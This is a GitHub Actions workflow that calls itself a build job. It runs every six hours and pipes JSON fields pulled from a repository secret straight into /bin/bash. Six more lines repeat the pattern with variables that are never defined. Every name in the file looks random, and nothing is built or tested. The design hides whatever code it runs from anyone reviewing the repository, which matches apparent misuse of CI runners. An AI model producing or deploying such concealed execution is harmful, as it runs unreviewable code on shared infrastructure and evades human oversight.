name: yaowenyuan4198

on:
  workflow_dispatch:
  schedule:
    - cron: '51 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yaowenyuan4198
        env:
          c70: ${{ secrets.c70 }}
        run: |
          echo $c70 | jq -r .py2502 | /bin/bash
          echo $lim2 | jq -r .j4 | /bin/bash
          echo $iykgd664 | jq -r .fqw69 | /bin/bash
          echo $p06619 | jq -r .dmfjr92 | /bin/bash
          echo $gv72 | jq -r .nm58589 | /bin/bash
          echo $kdgh26114 | jq -r .jk9952 | /bin/bash
          echo $kg794 | jq -r .i8 | /bin/bash

